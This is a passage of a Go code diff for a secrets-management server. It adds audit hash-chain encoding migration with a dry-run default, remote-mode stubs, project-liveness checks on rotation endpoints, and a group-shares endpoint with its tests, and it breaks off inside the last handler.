+	e := appendEvent(t, ls, "secret.read", desc, at)
+	legacyEntryHash := "legacy-" + e.EntryHash[:16]
+	require.NoError(t, ls.db.Model(&models.AuditEvent{}).Where("id = ?", e.ID).
+		Updates(map[string]interface{}{"prev_hash": prevHash, "entry_hash": legacyEntryHash}).Error)
+	e.PrevHash = prevHash
+	e.EntryHash = legacyEntryHash
+	return e
+}
+
+func TestMigrateAuditChainEncoding_RechainsUnderCurrentEncoding(t *testing.T) {
+	ls := newAuditChainTestStore(t)
+	base := time.Now().UTC()
+
+	e1 := appendLegacyEncodedEvent(t, ls, "first", base, auditGenesisHash)
+	e2 := appendLegacyEncodedEvent(t, ls, "second", base.Add(time.Second), e1.EntryHash)
+	e3 := appendLegacyEncodedEvent(t, ls, "third", base.Add(2*time.Second), e2.EntryHash)
+
+	// Sanity: as stored, the chain does NOT verify under the current encoding.
+	v, err := ls.VerifyAuditChain(context.Background(), nil)
+	require.NoError(t, err)
+	assert.False(t, v.Valid, "legacy-encoded rows must not verify under the current encoding before migration")
+
+	result, err := ls.MigrateAuditChainEncoding(context.Background(), false, nil)
+	require.NoError(t, err)
+	assert.Equal(t, int64(3), result.RowsMigrated)
+	assert.Equal(t, int64(0), result.UnchainedRowsSkipped)
+	assert.Equal(t, e3.ID, result.HeadID)
+	assert.NotEmpty(t, result.HeadHash)
+	assert.Equal(t, uint(0), result.AnchorRowID, "no anchor supplied, none should be reported")
+
+	v2, err := ls.VerifyAuditChain(context.Background(), nil)
+	require.NoError(t, err)
+	assert.True(t, v2.Valid, "chain must verify under the current encoding after migration: %s", v2.Reason)
+	assert.Equal(t, int64(3), v2.ChainedEvents)
+	assert.Equal(t, result.HeadHash, v2.HeadHash)
+	assert.Equal(t, result.HeadID, v2.HeadID)
+}
+
+func TestMigrateAuditChainEncoding_DryRunMakesNoChanges(t *testing.T) {
+	ls := newAuditChainTestStore(t)
+	base := time.Now().UTC()
+
+	e1 := appendLegacyEncodedEvent(t, ls, "first", base, auditGenesisHash)
+	e2 := appendLegacyEncodedEvent(t, ls, "second", base.Add(time.Second), e1.EntryHash)
+
+	result, err := ls.MigrateAuditChainEncoding(context.Background(), true, nil)
+	require.NoError(t, err)
+	assert.Equal(t, int64(2), result.RowsMigrated, "dry run still computes what WOULD change")
+	assert.NotEmpty(t, result.HeadHash)
+
+	// Nothing was actually persisted: the stored rows are unchanged, and the
+	// chain still fails verification exactly as before the call.
+	var stored1, stored2 models.AuditEvent
+	require.NoError(t, ls.db.First(&stored1, e1.ID).Error)
+	require.NoError(t, ls.db.First(&stored2, e2.ID).Error)
+	assert.Equal(t, e1.EntryHash, stored1.EntryHash, "dry run must not persist row 1")
+	assert.Equal(t, e2.EntryHash, stored2.EntryHash, "dry run must not persist row 2")
+
+	v, err := ls.VerifyAuditChain(context.Background(), nil)
+	require.NoError(t, err)
+	assert.False(t, v.Valid, "chain must still fail verification after a dry run")
+}
+
+func TestMigrateAuditChainEncoding_LeavesUnchainedLegacyPrefixAlone(t *testing.T) {
+	ls := newAuditChainTestStore(t)
+	base := time.Now().UTC()
+
+	// Two pre-ADR-029 rows: no hash chain at all (empty entry_hash).
+	tr := true
+	for i, d := range []string{"unchained-1", "unchained-2"} {
+		require.NoError(t, ls.db.Create(&models.AuditEvent{
+			EventType: "secret.read", Description: d, Success: &tr,
+			EventTime: base.Add(time.Duration(i) * time.Second), ActorType: "user",
+		}).Error)
+	}
+	c1 := appendLegacyEncodedEvent(t, ls, "chained-1", base.Add(10*time.Second), auditGenesisHash)
+	_ = appendLegacyEncodedEvent(t, ls, "chained-2", base.Add(11*time.Second), c1.EntryHash)
+
+	result, err := ls.MigrateAuditChainEncoding(context.Background(), false, nil)
+	require.NoError(t, err)
+	assert.Equal(t, int64(2), result.RowsMigrated, "only the chained rows are migrated")
+	assert.Equal(t, int64(2), result.UnchainedRowsSkipped, "the unchained legacy prefix is left untouched")
+
+	v, err := ls.VerifyAuditChain(context.Background(), nil)
+	require.NoError(t, err)
+	assert.True(t, v.Valid, "chain must verify after migration: %s", v.Reason)
+	assert.Equal(t, int64(2), v.UnchainedEvents)
+	assert.Equal(t, int64(2), v.ChainedEvents)
+}
+
+// TestMigrateAuditChainEncoding_ReSignsRetentionAnchor covers the interaction
+// with a retention purge that ran BEFORE the migration: the earliest
+// surviving row's prev_hash is a non-genesis anchor value (its real
+// predecessor was purged and can never be recomputed under any encoding).
+// The migration must recompute that row's entry_hash under the current
+// encoding while leaving its prev_hash exactly as the anchor says, and
+// report it back to the caller so the anchor itself can be re-signed.
+func TestMigrateAuditChainEncoding_ReSignsRetentionAnchor(t *testing.T) {
+	ls := newAuditChainTestStore(t)
+	base := time.Now().UTC()
+
+	const purgedPredecessorHash = "purged-predecessor-hash"
+	anchored := appendLegacyEncodedEvent(t, ls, "first-surviving", base, purgedPredecessorHash)
+	_ = appendLegacyEncodedEvent(t, ls, "second", base.Add(time.Second), anchored.EntryHash)
+
+	anchor := &storage.AuditChainAnchor{
+		RowID:     anchored.ID,
+		PrevHash:  purgedPredecessorHash,
+		EntryHash: anchored.EntryHash,
+	}
+
+	result, err := ls.MigrateAuditChainEncoding(context.Background(), false, anchor)
+	require.NoError(t, err)
+	assert.Equal(t, int64(2), result.RowsMigrated)
+	require.Equal(t, anchored.ID, result.AnchorRowID, "the earliest migrated row must be reported for anchor re-signing")
+	assert.NotEmpty(t, result.AnchorNewEntryHash)
+	assert.NotEqual(t, anchored.EntryHash, result.AnchorNewEntryHash, "the anchor row's hash changed under the new encoding")
+
+	var stored models.AuditEvent
+	require.NoError(t, ls.db.First(&stored, anchored.ID).Error)
+	assert.Equal(t, purgedPredecessorHash, stored.PrevHash, "the purged predecessor's hash is preserved verbatim, not recomputed")
+	assert.Equal(t, result.AnchorNewEntryHash, stored.EntryHash)
+
+	// A re-signed anchor (matching what the caller is expected to persist)
+	// must let the migrated chain verify from that point forward.
+	newAnchor := &storage.AuditChainAnchor{
+		RowID:     anchored.ID,
+		PrevHash:  purgedPredecessorHash,
+		EntryHash: result.AnchorNewEntryHash,
+	}
+	v, err := ls.VerifyAuditChain(context.Background(), newAnchor)
+	require.NoError(t, err)
+	assert.True(t, v.Valid, "chain must verify against the re-signed anchor: %s", v.Reason)
+}
+
+func TestMigrateAuditChainEncoding_Empty(t *testing.T) {
+	ls := newAuditChainTestStore(t)
+	result, err := ls.MigrateAuditChainEncoding(context.Background(), false, nil)
+	require.NoError(t, err)
+	assert.Equal(t, int64(0), result.RowsMigrated)
+	assert.Equal(t, int64(0), result.UnchainedRowsSkipped)
+	assert.Equal(t, uint(0), result.HeadID)
+}
+
+func TestMigrateAuditChainEncoding_AlreadyCurrentEncodingIsIdempotent(t *testing.T) {
+	ls := newAuditChainTestStore(t)
+	base := time.Now().UTC()
+	appendEvent(t, ls, "auth.login", "first", base)
+	appendEvent(t, ls, "secret.read", "second", base.Add(time.Second))
+
+	// Rows already chained under the CURRENT encoding: migration should be a
+	// no-op in effect (same hashes recomputed) and the chain stays valid.
+	result, err := ls.MigrateAuditChainEncoding(context.Background(), false, nil)
+	require.NoError(t, err)
+	assert.Equal(t, int64(2), result.RowsMigrated, "rows are re-walked and rewritten even if already current")
+
+	v, err := ls.VerifyAuditChain(context.Background(), nil)
+	require.NoError(t, err)
+	assert.True(t, v.Valid, "re-migrating already-current rows must not break the chain: %s", v.Reason)
+}

--- a/internal/storage/store/local_users.go
+++ b/internal/storage/store/local_users.go
@@ -400,6 +400,20 @@ func (ls *LocalStorage) GetUserGroups(ctx context.Context, userID uint) ([]*mode
 	return groups, nil
 }
 
+// ListAllUserGroupMemberships returns every user_groups row in the
+// deployment, unfiltered by project scope — see the storage.Storage interface
+// doc (#G44) for why this exists alongside GetUserGroups.
+func (ls *LocalStorage) ListAllUserGroupMemberships(ctx context.Context) ([]storage.UserGroupMembership, error) {
+	var rows []storage.UserGroupMembership
+	err := ls.db.WithContext(ctx).Model(&models.UserGroup{}).
+		Select("user_id", "group_id").
+		Find(&rows).Error
+	if err != nil {
+		return nil, fmt.Errorf("%s: %w", i18n.T("ErrorRetrievalFailed", nil), err)
+	}
+	return rows, nil
+}
+
 // --- Groups ---
 
 func (ls *LocalStorage) CreateGroup(ctx context.Context, group *models.Group) (*models.Group, error) {

--- a/internal/storage/store/remote_audit.go
+++ b/internal/storage/store/remote_audit.go
@@ -175,6 +175,14 @@ func (rs *RemoteStorage) VerifyAuditChain(_ context.Context, _ *storage.AuditCha
 	return nil, fmt.Errorf("VerifyAuditChain not available in remote mode")
 }
 
+// MigrateAuditChainEncoding is not available in remote mode: a spoke has no
+// direct access to the hub's audit_events table, and this migration must hold
+// an exclusive, whole-migration lock only the actual database owner can take.
+// Run this against the primary/hub server's own storage backend directly.
+func (rs *RemoteStorage) MigrateAuditChainEncoding(_ context.Context, _ bool, _ *storage.AuditChainAnchor) (*storage.AuditChainMigrationResult, error) {
+	return nil, fmt.Errorf("MigrateAuditChainEncoding not available in remote mode — run it against the primary server directly")
+}
+
 // GetSecretReadCounts is server-side only; read aggregation runs against the
 // local audit table and is never proxied over a remote HTTP call.
 func (rs *RemoteStorage) GetSecretReadCounts(_ context.Context, _ uint, _, _ time.Time, _ int) ([]storage.SecretReadEntry, error) {

--- a/internal/storage/store/remote_audit_test.go
+++ b/internal/storage/store/remote_audit_test.go
@@ -251,6 +251,15 @@ func TestRemoteStorage_VerifyAuditChain_Unsupported(t *testing.T) {
 	assert.Contains(t, err.Error(), "not available in remote mode")
 }
 
+func TestRemoteStorage_MigrateAuditChainEncoding_Unsupported(t *testing.T) {
+	rs, err := store.NewRemoteStorage(testConfig("http://127.0.0.1:0"))
+	require.NoError(t, err)
+
+	_, err = rs.MigrateAuditChainEncoding(context.Background(), true, nil)
+	assert.Error(t, err)
+	assert.Contains(t, err.Error(), "not available in remote mode")
+}
+
 // --- CreateAuditCheckpoint (unsupported) ---
 
 func TestRemoteStorage_CreateAuditCheckpoint_Unsupported(t *testing.T) {

--- a/internal/storage/store/remote_permission_baseline_completeness_test.go
+++ b/internal/storage/store/remote_permission_baseline_completeness_test.go
@@ -1,0 +1,19 @@
+package store
+
+// This file registers remote_users.go's ListAllUserGroupMemberships
+// remoteUnsupported stub into remoteUnsupportedAllowlist (declared in
+// remote_unsupported_completeness_test.go). See that file's NEW FEATURE
+// PATTERN doc comment — new entries belong in a feature-scoped file like this
+// one, not in the shared registry.
+
+func init() {
+	addRemoteUnsupported(map[string]remoteUnsupportedEntry{
+		"ListAllUserGroupMemberships": {statusIntentional,
+			"#G44: the batch-load counterpart to GetUserGroups (which IS remote-" +
+				"implemented), used only by core.GetPermissionBaseline — a raw, " +
+				"unscoped membership-table dump. That caller already calls " +
+				"ListAllUserRoleGrants/ListAllGroupRoleGrants first (both already " +
+				"allowlisted above with the same reasoning) and fails closed under " +
+				"storage.type: remote before this method is ever reached"},
+	})
+}

--- a/internal/storage/store/remote_users.go
+++ b/internal/storage/store/remote_users.go
@@ -821,6 +821,15 @@ func (rs *RemoteStorage) GetUserGroups(ctx context.Context, userID uint) ([]*mod
 	return groups, nil
 }
 
+// ListAllUserGroupMemberships is not available in remote mode: its only
+// caller (GetPermissionBaseline, #G44) already can't run remotely either —
+// ListAllUserRoleGrants/ListAllGroupRoleGrants above are both
+// remoteUnsupported for the same reason (a deployment-wide unfiltered export,
+// not a per-request query the hub can answer through a spoke).
+func (rs *RemoteStorage) ListAllUserGroupMemberships(_ context.Context) ([]storage.UserGroupMembership, error) {
+	return nil, remoteUnsupported("ListAllUserGroupMemberships")
+}
+
 // --- Groups ---
 
 // CreateGroup creates a new group via POST /api/v1/system/groups — a raw

--- a/internal/storage/store/store_s4_test.go
+++ b/internal/storage/store/store_s4_test.go
@@ -528,6 +528,13 @@ func TestGroup_UserMembership(t *testing.T) {
 	require.NoError(t, err)
 	assert.Len(t, groups, 1)
 
+	// ListAllUserGroupMemberships (#G44 batch-load counterpart of GetUserGroups).
+	memberships, err := ls.ListAllUserGroupMemberships(ctx)
+	require.NoError(t, err)
+	require.Len(t, memberships, 1)
+	assert.Equal(t, u.ID, memberships[0].UserID)
+	assert.Equal(t, g.ID, memberships[0].GroupID)
+
 	// RemoveUserFromGroup (global: projectID=0).
 	err = ls.RemoveUserFromGroup(ctx, u.ID, g.ID, 0)
 	require.NoError(t, err)

--- a/server/http/handlers/audit.go
+++ b/server/http/handlers/audit.go
@@ -464,3 +464,56 @@ func (h *AuditHandler) WriteAuditCheckpoint(w http.ResponseWriter, r *http.Reque
 	}
 	sendSuccess(w, resp, "audit checkpoint written")
 }
+
+// MigrateAuditChainEncoding handles POST /api/v1/audit/migrate-chain-encoding —
+// a one-time, operator-triggered re-derivation of entry_hash/prev_hash for
+// every chained audit_events row under the current hash encoding (see
+// internal/core/audit_chain_migrate.go's doc comment for why this exists and
+// why it is deliberately NOT automatic). Privileged (system.write, same bar
+// as /checkpoint): this rewrites the one dataset whose entire purpose is
+// tamper evidence.
+//
+// ?dry_run=true (the default when the query param is absent) computes and
+// returns the result WITHOUT persisting anything, so an operator can preview
+// row/anchor counts before committing. A real run requires the query param
+// set explicitly to "false" — there is no way to trigger a real run by
+// omission or typo, only by deliberately opting out of the safe default.
+//
+// The caller is responsible for ensuring no other process can reach this
+// server's audit_events table for the duration of a real run (stop the
+// server's OTHER instances if load-balanced, or run during a maintenance
+// window) — this endpoint's own transaction only serializes against this
+// process's own LogAuditEvent path, not an entirely separate connection.
+func (h *AuditHandler) MigrateAuditChainEncoding(w http.ResponseWriter, r *http.Request) {
+	userCtx := middleware.GetUserFromContext(r.Context())
+	if userCtx == nil {
+		sendError(w, "Unauthorized", errUserContext, http.StatusUnauthorized, nil)
+		return
+	}
+
+	dryRun := r.URL.Query().Get("dry_run") != "false"
+
+	result, err := h.coreService.MigrateAuditChainEncoding(r.Context(), userCtx.UserID, dryRun)
+	if err != nil {
+		log.Printf("Error migrating audit chain encoding: %v", err)
+		sendError(w, "InternalError", clientSafe(err), http.StatusInternalServerError, nil)
+		return
+	}
+
+	resp := map[string]interface{}{
+		"dry_run":                dryRun,
+		"rows_migrated":          result.RowsMigrated,
+		"unchained_rows_skipped": result.UnchainedRowsSkipped,
+		"head_id":                result.HeadID,
+		"head_hash":              result.HeadHash,
+	}
+	if result.AnchorRowID != 0 {
+		resp["anchor_row_id"] = result.AnchorRowID
+		resp["anchor_new_entry_hash"] = result.AnchorNewEntryHash
+	}
+	msg := "audit chain encoding migration preview (dry run — nothing was written; re-run with ?dry_run=false to apply)"
+	if !dryRun {
+		msg = "audit chain encoding migration applied"
+	}
+	sendSuccess(w, resp, msg)
+}

--- a/server/http/handlers/audit_migrate_chain_handler_test.go
+++ b/server/http/handlers/audit_migrate_chain_handler_test.go
@@ -1,0 +1,105 @@
+package handlers
+
+import (
+	"encoding/json"
+	"net/http"
+	"net/http/httptest"
+	"testing"
+
+	"github.com/keyorixhq/keyorix/internal/core"
+	"github.com/keyorixhq/keyorix/internal/storage/models"
+	"github.com/keyorixhq/keyorix/internal/storage/sqlitedialect"
+	"github.com/keyorixhq/keyorix/internal/storage/store"
+	"github.com/stretchr/testify/assert"
+	"github.com/stretchr/testify/require"
+	"gorm.io/gorm"
+)
+
+// openAuditChainTestDB opens a fresh in-memory SQLite DB migrated for the
+// audit hash-chain tables only — this handler's underlying core/storage call
+// touches audit_events and system_metadata (for the retention anchor), not
+// the RBAC tables openTestDB sets up for other handlers.
+func openAuditChainTestDB(t *testing.T) *gorm.DB {
+	t.Helper()
+	db, err := gorm.Open(sqlite.Open(":memory:"), &gorm.Config{})
+	require.NoError(t, err)
+	require.NoError(t, db.AutoMigrate(&models.AuditEvent{}, &models.SystemMetadata{}))
+	return db
+}
+
+func TestAuditHandler_MigrateChainEncoding_RequiresUserContext(t *testing.T) {
+	db := openAuditChainTestDB(t)
+	h := NewAuditHandler(core.NewKeyorixCore(store.NewLocalStorage(db)))
+
+	req := httptest.NewRequest(http.MethodPost, "/api/v1/audit/migrate-chain-encoding", nil)
+	w := httptest.NewRecorder()
+	h.MigrateAuditChainEncoding(w, req)
+
+	assert.Equal(t, http.StatusUnauthorized, w.Code)
+}
+
+// No query string at all must behave identically to the safe default
+// (dry_run=true) — an operator who omits the parameter, or mistypes it,
+// still only gets a preview.
+func TestAuditHandler_MigrateChainEncoding_DefaultsToDryRun(t *testing.T) {
+	db := openAuditChainTestDB(t)
+	h := NewAuditHandler(core.NewKeyorixCore(store.NewLocalStorage(db)))
+
+	req := withUserCtx(httptest.NewRequest(http.MethodPost, "/api/v1/audit/migrate-chain-encoding", nil))
+	w := httptest.NewRecorder()
+	h.MigrateAuditChainEncoding(w, req)
+
+	require.Equal(t, http.StatusOK, w.Code)
+	var body struct {
+		Data struct {
+			DryRun bool `json:"dry_run"`
+		} `json:"data"`
+	}
+	require.NoError(t, json.Unmarshal(w.Body.Bytes(), &body))
+	assert.True(t, body.Data.DryRun, "no dry_run query param must default to a preview, never a real run")
+}
+
+// A typo'd or unrecognized dry_run value must still fail SAFE (preview), not
+// accidentally opt into a real run — only the literal string "false" does.
+func TestAuditHandler_MigrateChainEncoding_UnrecognizedDryRunValueStaysDryRun(t *testing.T) {
+	db := openAuditChainTestDB(t)
+	h := NewAuditHandler(core.NewKeyorixCore(store.NewLocalStorage(db)))
+
+	req := withUserCtx(httptest.NewRequest(http.MethodPost, "/api/v1/audit/migrate-chain-encoding?dry_run=nope", nil))
+	w := httptest.NewRecorder()
+	h.MigrateAuditChainEncoding(w, req)
+
+	require.Equal(t, http.StatusOK, w.Code)
+	var body struct {
+		Data struct {
+			DryRun bool `json:"dry_run"`
+		} `json:"data"`
+	}
+	require.NoError(t, json.Unmarshal(w.Body.Bytes(), &body))
+	assert.True(t, body.Data.DryRun)
+}
+
+func TestAuditHandler_MigrateChainEncoding_ExplicitFalseAppliesForReal(t *testing.T) {
+	db := openAuditChainTestDB(t)
+	c := core.NewKeyorixCore(store.NewLocalStorage(db))
+	h := NewAuditHandler(c)
+
+	req := withUserCtx(httptest.NewRequest(http.MethodPost, "/api/v1/audit/migrate-chain-encoding?dry_run=false", nil))
+	w := httptest.NewRecorder()
+	h.MigrateAuditChainEncoding(w, req)
+
+	require.Equal(t, http.StatusOK, w.Code)
+	var body struct {
+		Data struct {
+			DryRun               bool   `json:"dry_run"`
+			RowsMigrated         int64  `json:"rows_migrated"`
+			UnchainedRowsSkipped int64  `json:"unchained_rows_skipped"`
+			HeadID               uint   `json:"head_id"`
+			HeadHash             string `json:"head_hash"`
+		} `json:"data"`
+		Message string `json:"message"`
+	}
+	require.NoError(t, json.Unmarshal(w.Body.Bytes(), &body))
+	assert.False(t, body.Data.DryRun)
+	assert.Contains(t, body.Message, "applied")
+}

--- a/server/http/handlers/handlers_s13_pat_notif_rotpol_deps_test.go
+++ b/server/http/handlers/handlers_s13_pat_notif_rotpol_deps_test.go
@@ -18,6 +18,7 @@ import (
 	"fmt"
 	"net/http"
 	"net/http/httptest"
+	"strconv"
 	"testing"
 
 	"github.com/keyorixhq/keyorix/internal/storage/models"
@@ -485,15 +486,36 @@ func TestGetProjectRotationOrder_BadID_S13(t *testing.T) {
 	assert.Equal(t, http.StatusBadRequest, w.Code)
 }
 
-// TestGetProjectRotationOrder_HappyPath_S13 — project with no secrets → empty order.
+// TestGetProjectRotationOrder_HappyPath_S13 — a real, live project with no
+// secrets → empty order, 200. Uses a fresh isolated core (rather than the
+// shared newSecretHandlerS4 DB) so it can create its own real Project row: a
+// scoped role binding survives project soft-delete, so the handler now
+// re-checks project liveness before returning data, and a bare hardcoded
+// project ID with no backing row would 404.
 func TestGetProjectRotationOrder_HappyPath_S13(t *testing.T) {
 	t.Parallel()
-	h := newSecretHandlerS4(t)
-	req := withUserCtx(withChiParam(httptest.NewRequest(http.MethodGet, "/", nil), "id", "1"))
+	cs := freshCoreS12(t)
+	h, err := NewSecretHandler(cs)
+	require.NoError(t, err)
+	proj, err := cs.Storage().CreateProject(context.Background(), &models.Project{Name: "proj-rotorder-happy-s13"})
+	require.NoError(t, err)
+
+	req := withUserCtx(withChiParam(httptest.NewRequest(http.MethodGet, "/", nil), "id", strconv.FormatUint(uint64(proj.ID), 10)))
 	w := httptest.NewRecorder()
 	h.GetProjectRotationOrder(w, req)
-	// no project means storage returns empty slice → 200
 	assert.Equal(t, http.StatusOK, w.Code)
+}
+
+// TestGetProjectRotationOrder_ProjectNotFound_S13 pins the project-liveness fix
+// itself: a role binding scoped to a project ID with no backing row (or a
+// soft-deleted one) must 404, not silently return an empty order.
+func TestGetProjectRotationOrder_ProjectNotFound_S13(t *testing.T) {
+	t.Parallel()
+	h := newSecretHandlerS4(t)
+	req := withUserCtx(withChiParam(httptest.NewRequest(http.MethodGet, "/", nil), "id", "999999"))
+	w := httptest.NewRecorder()
+	h.GetProjectRotationOrder(w, req)
+	assert.Equal(t, http.StatusNotFound, w.Code)
 }
 
 // TestGetProjectRotationPlan_BadID_S13 — non-numeric id → 400.
@@ -506,14 +528,31 @@ func TestGetProjectRotationPlan_BadID_S13(t *testing.T) {
 	assert.Equal(t, http.StatusBadRequest, w.Code)
 }
 
-// TestGetProjectRotationPlan_HappyPath_S13 — no secrets in project → 200.
+// TestGetProjectRotationPlan_HappyPath_S13 — a real, live project with no
+// secrets → 200. See TestGetProjectRotationOrder_HappyPath_S13 for why this
+// needs a real backing Project row now.
 func TestGetProjectRotationPlan_HappyPath_S13(t *testing.T) {
 	t.Parallel()
-	h := newSecretHandlerS4(t)
-	req := withUserCtx(withChiParam(httptest.NewRequest(http.MethodGet, "/", nil), "id", "1"))
+	cs := freshCoreS12(t)
+	h, err := NewSecretHandler(cs)
+	require.NoError(t, err)
+	proj, err := cs.Storage().CreateProject(context.Background(), &models.Project{Name: "proj-rotplan-happy-s13"})
+	require.NoError(t, err)
+
+	req := withUserCtx(withChiParam(httptest.NewRequest(http.MethodGet, "/", nil), "id", strconv.FormatUint(uint64(proj.ID), 10)))
 	w := httptest.NewRecorder()
 	h.GetProjectRotationPlan(w, req)
 	assert.Equal(t, http.StatusOK, w.Code)
+}
+
+// TestGetProjectRotationPlan_ProjectNotFound_S13 — see the Order twin above.
+func TestGetProjectRotationPlan_ProjectNotFound_S13(t *testing.T) {
+	t.Parallel()
+	h := newSecretHandlerS4(t)
+	req := withUserCtx(withChiParam(httptest.NewRequest(http.MethodGet, "/", nil), "id", "999999"))
+	w := httptest.NewRecorder()
+	h.GetProjectRotationPlan(w, req)
+	assert.Equal(t, http.StatusNotFound, w.Code)
 }
 
 // TestGetDeploymentRotationPlan_HappyPath_S13 — empty DB → 200.

--- a/server/http/handlers/secret_dependencies.go
+++ b/server/http/handlers/secret_dependencies.go
@@ -172,6 +172,15 @@ func (h *SecretHandler) GetProjectRotationOrder(w http.ResponseWriter, r *http.R
 		h.sendError(w, "InvalidParameter", "Invalid project ID", http.StatusBadRequest, nil)
 		return
 	}
+	// A scoped role binding survives project soft-delete (RequireScopedPermission
+	// authorizes on the binding, not on the project's current lifecycle state), so
+	// re-check the project is actually live before returning its rotation data —
+	// mirrors the identical fix in the gRPC twin (ProjectGRPCService.
+	// GetProjectRotationOrder).
+	if _, err := h.coreService.GetProject(r.Context(), uint(id)); err != nil {
+		h.sendError(w, "Error", err.Error(), dependencyErrorStatus(err.Error()), nil)
+		return
+	}
 	order, err := h.coreService.GetProjectRotationOrder(r.Context(), uint(id))
 	if err != nil {
 		h.sendError(w, "Error", err.Error(), dependencyErrorStatus(err.Error()), nil)
@@ -191,6 +200,13 @@ func (h *SecretHandler) GetProjectRotationPlan(w http.ResponseWriter, r *http.Re
 	id, err := strconv.ParseUint(chi.URLParam(r, "id"), 10, 32)
 	if err != nil {
 		h.sendError(w, "InvalidParameter", "Invalid project ID", http.StatusBadRequest, nil)
+		return
+	}
+	// See GetProjectRotationOrder above: a scoped role binding survives project
+	// soft-delete, so re-check liveness before returning rotation data — mirrors
+	// the gRPC twin's identical fix.
+	if _, err := h.coreService.GetProject(r.Context(), uint(id)); err != nil {
+		h.sendError(w, "Error", err.Error(), dependencyErrorStatus(err.Error()), nil)
 		return
 	}
 	plan, err := h.coreService.GenerateRotationPlan(r.Context(), uint(id))

--- a/server/http/handlers/shares_group_shares_test.go
+++ b/server/http/handlers/shares_group_shares_test.go
@@ -1,0 +1,102 @@
+package handlers
+
+import (
+	"net/http"
+	"net/http/httptest"
+	"testing"
+
+	"github.com/keyorixhq/keyorix/internal/storage/sqlitedialect"
+	"github.com/stretchr/testify/assert"
+	"github.com/stretchr/testify/require"
+	"gorm.io/gorm"
+
+	"github.com/keyorixhq/keyorix/internal/core"
+	"github.com/keyorixhq/keyorix/internal/i18n"
+	"github.com/keyorixhq/keyorix/internal/storage/models"
+	"github.com/keyorixhq/keyorix/internal/storage/store"
+)
+
+// TestListGroupSharesHandler is the regression test for #G66: previously the
+// only way to read a group's incoming share grants was the embedded/local CLI
+// path, which silently ignored a connected server. This is now a real HTTP
+// endpoint, self-authorizing via #G10's AuthorizePrincipal.
+func TestListGroupSharesHandler(t *testing.T) {
+	require.NoError(t, i18n.InitializeForTesting())
+	db, err := gorm.Open(sqlite.Open(":memory:"), &gorm.Config{})
+	require.NoError(t, err)
+	require.NoError(t, db.AutoMigrate(
+		&models.SecretNode{}, &models.ShareRecord{}, &models.Group{},
+		&models.User{}, &models.Role{}, &models.UserRole{}, &models.Permission{}, &models.RolePermission{},
+		&models.UserGroup{}, &models.GroupRole{}, &models.Project{}, &models.Environment{},
+	))
+
+	// #G10: ListGroupShares self-authorizes (secrets.read, global scope);
+	// withUserCtx's UserID 1 needs a real grant.
+	role := &models.Role{Name: "admin"}
+	require.NoError(t, db.Create(role).Error)
+	require.NoError(t, db.Create(&models.UserRole{UserID: 1, RoleID: role.ID, ProjectID: 0, EnvironmentID: 0}).Error)
+
+	require.NoError(t, db.Create(&models.SecretNode{ID: 1, Name: "alpha", IsSecret: true, OwnerID: 1}).Error)
+	require.NoError(t, db.Create(&models.ShareRecord{ID: 1, SecretID: 1, OwnerID: 1, RecipientID: 7, IsGroup: true, Permission: "read"}).Error)
+
+	h, err := NewShareHandler(core.NewKeyorixCore(store.NewLocalStorage(db)))
+	require.NoError(t, err)
+
+	t.Run("returns the group's share grants", func(t *testing.T) {
+		req := withUserCtx(withChiParam(httptest.NewRequest(http.MethodGet, "/api/v1/groups/7/shares", nil), "id", "7"))
+		w := httptest.NewRecorder()
+		h.ListGroupShares(w, req)
+
+		require.Equal(t, http.StatusOK, w.Code)
+		data := decodeData(t, w)
+		shares := data["shares"].([]interface{})
+		require.Len(t, shares, 1)
+		share := shares[0].(map[string]interface{})
+		assert.Equal(t, float64(1), share["SecretID"])
+		assert.Equal(t, float64(7), share["RecipientID"])
+	})
+
+	t.Run("requires a user context", func(t *testing.T) {
+		req := withChiParam(httptest.NewRequest(http.MethodGet, "/api/v1/groups/7/shares", nil), "id", "7")
+		w := httptest.NewRecorder()
+		h.ListGroupShares(w, req)
+		assert.Equal(t, http.StatusUnauthorized, w.Code)
+	})
+
+	t.Run("rejects an invalid group id", func(t *testing.T) {
+		req := withUserCtx(withChiParam(httptest.NewRequest(http.MethodGet, "/api/v1/groups/not-a-number/shares", nil), "id", "not-a-number"))
+		w := httptest.NewRecorder()
+		h.ListGroupShares(w, req)
+		assert.Equal(t, http.StatusBadRequest, w.Code)
+	})
+
+	t.Run("a group with no shares returns an empty list", func(t *testing.T) {
+		req := withUserCtx(withChiParam(httptest.NewRequest(http.MethodGet, "/api/v1/groups/99/shares", nil), "id", "99"))
+		w := httptest.NewRecorder()
+		h.ListGroupShares(w, req)
+
+		require.Equal(t, http.StatusOK, w.Code)
+		assert.Empty(t, decodeData(t, w)["shares"].([]interface{}))
+	})
+}
+
+// TestListGroupSharesHandler_Unauthorized proves the endpoint refuses a caller
+// with no secrets.read grant at all, not just an unauthenticated one.
+func TestListGroupSharesHandler_Unauthorized(t *testing.T) {
+	require.NoError(t, i18n.InitializeForTesting())
+	db, err := gorm.Open(sqlite.Open(":memory:"), &gorm.Config{})
+	require.NoError(t, err)
+	require.NoError(t, db.AutoMigrate(
+		&models.SecretNode{}, &models.ShareRecord{}, &models.Group{},
+		&models.User{}, &models.Role{}, &models.UserRole{}, &models.Permission{}, &models.RolePermission{},
+		&models.UserGroup{}, &models.GroupRole{}, &models.Project{}, &models.Environment{},
+	))
+
+	h, err := NewShareHandler(core.NewKeyorixCore(store.NewLocalStorage(db)))
+	require.NoError(t, err)
+
+	req := withUserCtx(withChiParam(httptest.NewRequest(http.MethodGet, "/api/v1/groups/7/shares", nil), "id", "7"))
+	w := httptest.NewRecorder()
+	h.ListGroupShares(w, req)
+	assert.Equal(t, http.StatusForbidden, w.Code)
+}

--- a/server/http/handlers/shares_query.go
+++ b/server/http/handlers/shares_query.go
@@ -242,6 +242,44 @@ func (h *ShareHandler) ListGroupSharedSecrets(w http.ResponseWriter, r *http.Req
 	h.sendSuccess(w, map[string]interface{}{"secrets": secrets}, "")
 }
 
+// ListGroupShares handles GET /api/v1/groups/{id}/shares — the share grants
+// made TO a group (as opposed to ListGroupSharedSecrets' resolved-secrets
+// view). #G66: previously only the embedded/local CLI path
+// (`keyorix share group-shares`) could reach this data at all, silently
+// ignoring a connected server; there was no HTTP endpoint to route it
+// through. Mirrors ListGroupSharedSecrets' actor-threading exactly — #G10
+// already made the core function self-authorize, so this can safely expose
+// it without shipping a new unauthenticated-scope disclosure surface.
+func (h *ShareHandler) ListGroupShares(w http.ResponseWriter, r *http.Request) {
+	userCtx := middleware.GetUserFromContext(r.Context())
+	if userCtx == nil {
+		h.sendError(w, "Unauthorized", errUserContext, http.StatusUnauthorized, nil)
+		return
+	}
+
